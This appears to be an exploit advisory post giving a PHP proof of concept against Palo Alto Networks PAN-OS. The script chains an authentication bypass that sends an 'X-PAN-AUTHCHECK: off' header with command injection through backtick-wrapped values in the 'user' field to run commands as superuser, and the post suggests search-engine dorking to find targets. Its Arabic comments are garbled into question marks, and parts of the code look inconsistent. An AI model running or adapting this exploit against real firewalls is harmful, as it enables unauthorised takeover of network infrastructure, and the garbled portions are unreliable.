Palo Alto Networks PAN-OS 11.2 PHP Code Injection

=============================================================================================================================================
| # Title Palo Alto Networks PAN-OS 11.2 PHP Code Injection

=============================================================================================================================================
| # Title : Palo Alto Networks PAN-OS 11.2 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://paloaltonetworks.com |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Bypasses authentication using CVE-2024-0012.

Exploits command execution vulnerability CVE-2024-9474.

Uses an administrator session to run any commands on the system.

Supports execution of any command on the system, such as loading a shell.

( https://packetstorm.news/files/id/182665/ - CVE-2024-24809, CVE-2024-5910 )

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] SeT target = Line : 77

[+] PayLoad :

<?php

function sendRequest($url, $data = null, $headers = [], $method = 'GET', $cookies = []) {
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

if (!empty($headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
}

if (!empty($cookies)) {
curl_setopt($ch, CURLOPT_COOKIE, implode("; ", $cookies));
}

if ($method == 'POST') {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}

$response = curl_exec($ch);
curl_close($ch);

return $response;
}

// ? ????? ???????? ??????? ??? ???? ?????
function bypassAuth($target) {
$auth_url = "$target/php/utils/createRemoteAppwebSession.php?" . bin2hex(random_bytes(4)) . ".js.map";

$postData = [
'user' => '`whoami`', // ???? ?????? ??? `cmd.exe /c whoami` ?? ??????
'userRole' => 'superuser',
'remoteHost' => '',
'vsys' => 'vsys1'
];

$headers = [
"X-PAN-AUTHCHECK: off"
];

$response = sendRequest($auth_url, http_build_query($postData), $headers, 'POST');

if (strpos($response, "PHPSESSID") !== false) {
preg_match('/PHPSESSID=([^;]+)/', $response, $matches);
return $matches[1] ?? null;
}

return null;
}

// ? ??????? ????? ??????? ??? ?????? ??????? ?????
function executeCommand($target, $session, $cmd) {
$exploit_url = "$target/index.php/.js.map";

$cookies = ["PHPSESSID=$session"];

// ????? ??????? ????? ??? ??????
if (stripos(PHP_OS, 'WIN') !== false) {
$cmd = "cmd.exe /c " . $cmd; // ??? ??? ??????? ?????? cmd.exe
}

$postData = [
'user' => "`$cmd`",
'userRole' => 'superuser',
'remoteHost' => '',
'vsys' => 'vsys1'
];

sendRequest($exploit_url, $postData, [], 'GET', $cookies);
}

// ? ????? ?????????
$target = "http://127.0.0.1"; // ? ??? ????? ???

echo "[+] ????? ????????...\n";
$session = bypassAuth($target);

if ($session) {
echo "[+] ?? ?????? ??? ??????: $session\n";

if (stripos(PHP_OS, 'WIN') !== false) {
echo "[+] ????? ??? Windows: whoami\n";
executeCommand($target, $session, "whoami");
} else {
echo "[+] ????? ??? Linux: whoami\n";
executeCommand($target, $session, "whoami");
}

} else {
echo "[-] ??? ????? ????????!\n";
}

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================